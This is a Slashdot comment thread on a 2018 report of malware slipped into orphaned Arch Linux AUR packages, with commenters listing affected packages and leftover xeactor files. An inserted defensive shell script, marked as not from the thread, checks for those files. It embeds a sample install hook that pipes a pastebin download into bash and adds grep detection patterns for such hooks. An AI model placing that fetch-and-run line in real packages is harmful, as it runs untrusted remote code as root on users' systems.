Malware Found in Arch Linux AUR Package Repository (bleepingcomputer.com)

An anonymous reader shares a report: Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code has been removed thanks to the quick intervention of the AUR team. The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors. On Saturday, a user going by the pseudonym of "xeactor" took over one such orphaned package named "acroread" that allows Arch Linux users to view PDF files. According to a Git commit to the package's source code, xeactor added malicious code that would download a file named "~x" from ptpb [dot] pw, a lightweight site mimicking Pastebin that allows users to share small pieces of text.
  • by AlanObject ( 3603453 ) on Tuesday July 10, 2018 @06:48PM (#56925748)

    From the looks of it the bad actor xeactor didn't have any expectation beyond finding out if his little trick would work or not.

    On the other side this could be a case study about the immune system that open source provides.

  • by Anonymous Coward

    I'm more interested in why there is so little malware. I would have expected lots of malware without any packages needing to be hijacked.

    • by jmccue ( 834797 )

      I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works, but with the amount of packages available in some distros these days I guess I should not be surprised.

      Sad that distro maintainers may have to vet maintainers now, adding an additional burden. But as a user we should always be careful with non-core packages.

      • I made this comment in the story that is about to roll off the bottom of the page...

        At home, I have used Linux - first Redhat, then Fedora - since about 1999. I have never used any sort of virus/malware scanning software. As far as I know, I have never had any malware. I don't know how common this is.

    • by Anonymous Coward

      I'm more interested in why there is so little malware.

      How many packages (maintainers) are actually already compromised, waiting for the trigger to be pulled to push out the big fail? How would you know?

    • by raymorris ( 2726007 ) on Tuesday July 10, 2018 @08:07PM (#56925996) Journal

      He was caught within a few hours, because all changes are public:

      https://aur.archlinux.org/cgit... [archlinux.org]

      Possibly bad guys would rather add trojans to iPhone and Android apps, which may stay in the store for months without detection. You can't tell what changes have been made to compiled apps you download on iPhone, Android, or Windows.

    • by Anonymous Coward

      It needs another malware program to run. Something called systemd.

    • First: We don't know if there is any more until we find it. Therefore: The System is as Secure as an Open Door.

      Second: Malware authors target platforms that matter, i.e. Windows (large user base), RedHat (users are companies), the Linux kernel itself (large user base, governments, companies, etc...)

      And Lastly: There is nothing worthwhile to steal from unemployed neckbeards (although I like Arch, and I work over 14 hrs a day the days I don't attend university).

    • by AHuxley ( 892839 )
      It's a lot of work for the number of users per distro. To look at free work on a distro on the users' computer?
      With other consumer OS the ability to "consume" would be of interest to malware.
    • Effort vs. effect. And that ratio simply sucks when you consider the market share of Linux, and then that this market share is also again split up between the various distributions.

      Hence invading a distribution repository isn't that helpful if your goal is what most untargeted malware attacks are aiming for: Wide distribution. It's different if you have a specific target in mind, like a particular government facility, but then you would probably be rather targeting one of the larger distributions, not Arch.

    • People aren't going to waste their time when they know any malicious code will be discovered quickly and there is a high chance their name will be spread far and wide on the blackball circuit.
  • First, the post-install script runs as root. Second, it runs during installation. If putting it in the program (e.g. acroread), the user has to run it to trigger. Most Linux package systems support post-install scripts. e.g. https://docs-old.fedoraproject... [fedoraproject.org]
    • by Anonymous Coward

      I recommend either installing AUR packages by hand, during which you can check the post-install script, or using an AUR helper that allows viewing of said script. True, it takes time to verify yourself. But a cursory glance helps screen some of the stupid stuff like pulling a script from a pastebin clone.

      And yes, it takes time. That's always a tradeoff, convenience vs security.

  • Affected Packages

    by Philotomy ( 1635267 ) on Tuesday July 10, 2018 @10:20PM (#56926452)

    According to posts on aur-general [archlinux.org], the known affected packages are:

    • acroread 9.5.5-8
    • balz 1.20-3
    • minergate 8.1-2

    According to comments on the AUR acroread package [archlinux.org], the script the compromised package installed (to upload system details) contained an error and wouldn't function properly. The script also installed a systemd timer, and the comments advise checking your system for:

    • /usr/lib/xeactor
    • /usr/lib/systemd/system/xeactor.timer
    • /usr/lib/systemd/system/xeactor.service

    As a side-comment, for those unfamiliar with Arch, these compromised packages are not part of the official Arch repositories. The AUR is a "user repository": a collection of user-supplied packages which require deliberate download and installation. AUR packages should always be reviewed before installing them, and not installed if you don't trust the package. As the AUR documentation [archlinux.org] explains, "Warning: Carefully check all files. Carefully check the PKGBUILD and any .install file for malicious commands. PKGBUILDs are bash scripts containing functions to be executed by makepkg: these functions can contain any valid commands or Bash syntax, so it is totally possible for a PKGBUILD to contain dangerous commands through malice or ignorance on the part of the author. Since makepkg uses fakeroot (and should never be run as root), there is some level of protection but you should never count on it. If in doubt, do not build the package and seek advice on the forums or mailing list."
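    Added example, not code from the thread or from the Arch project: a small POSIX sh check that turns the two pieces of advice above (inspect the .install hook before makepkg runs it, and look for the xeactor artefacts listed on aur-general) into something runnable. The sample .install file, the grep patterns and the optional scan root are constructed for illustration; only the three artefact paths come from the thread.

```shell
#!/bin/sh
# Added example (not from the Slashdot thread or the Arch project). Two defender-side
# checks: (1) find the xeactor artefacts named on aur-general, (2) flag lines in a
# PKGBUILD/.install that fetch remote content or pipe it into a shell, so the file
# is reviewed before makepkg executes it. Patterns and the sample are constructed.

# Artefact paths as listed in the thread.
XEACTOR_PATHS="/usr/lib/xeactor /usr/lib/systemd/system/xeactor.timer /usr/lib/systemd/system/xeactor.service"

# check_xeactor_artifacts [root]: print any artefact present under root (default:
# the live filesystem); return 1 if at least one exists, 0 if none do.
check_xeactor_artifacts() {
    root="${1:-}"
    found=0
    for p in $XEACTOR_PATHS; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $root$p"
            found=1
        fi
    done
    return "$found"
}

# scan_install_script <file>: print numbered lines that download or pipe into a
# shell (curl, wget, "| sh", paste hosts); return 1 if any were found, else 0.
# The host list is a constructed starting point, not an exhaustive blocklist.
scan_install_script() {
    hits=$(grep -nE 'curl|wget|\|[[:space:]]*(ba)?sh([[:space:]]|$)|ptpb\.pw|pastebin' "$1" || true)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Constructed sample: a post_install hook of the kind the thread describes.
demo_dir=$(mktemp -d)
cat > "$demo_dir/acroread.install" <<'EOF'
post_install() {
    curl -s https://ptpb.pw/~x | bash
}
EOF
scan_install_script "$demo_dir/acroread.install" || echo "REJECT: review this hook before installing"
check_xeactor_artifacts || echo "xeactor artefacts present on this system"
rm -rf "$demo_dir"
```

    Run it with the path of a PKGBUILD or .install you are about to build; a non-zero return from either function is a reason to stop and read the file by hand.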

    • by Anonymous Coward

      The official security bulletin also advises end users to look for a highly suspect and malicious malware code called 'systemd'. If found, removal is strongly recommended and encouraged for both the sanity and security of the end user and system.

    • by AmiMoJo ( 196126 )

      Ah, the classic wetware exploit: user too lazy to carefully examine every file before installing.

  • If you read the mailing list thread you understand where the real problem is.

    "Users should check what they install". What's been your latest package check?
    Have you checksummed your ISO download?

    And why shouldn't I check the downloads from the main website? Because of trust?
    There can always be a crack I can use to slip into, if I have enough motivation.

    I think the whole system is screwed up. I think "we can't rewind, we've gone too far".

  • by damaki ( 997243 ) on Wednesday July 11, 2018 @01:52AM (#56926992)
    It is written basically everywhere in the AUR official documentation: do not trust AUR packages, verify everything before install! AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it. For AUR packages security, you are on your own and you should check the sources thoroughly when you install an AUR package!
    • by sad_ ( 7868 )

      the people who actually care are a minority, most people will just install whatever.
      it's like that on windows (people just download and install anything they find on whatever shady site) or smartphones (most android problems result from installing apk's downloaded from... shady sites).
      things like AUR, PPA's, containers (docker, snap, ...) etc bring this problem to linux. it's a security disaster waiting to happen.

    • AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it.

      No, AUR packages are not like Ubuntu PPAs, because every deb is signed, and every PPA belongs to a specific user. You cannot get malware from another user account which has taken over a PPA simply by updating, because Ubuntu does not allow different user accounts to take over a PPA. Naturally, someone who manages to take over someone else's identity to the point that they can sign packages as that user can upload malware to their PPA, but that's true of all such schemes.

      Letting users take over other users'
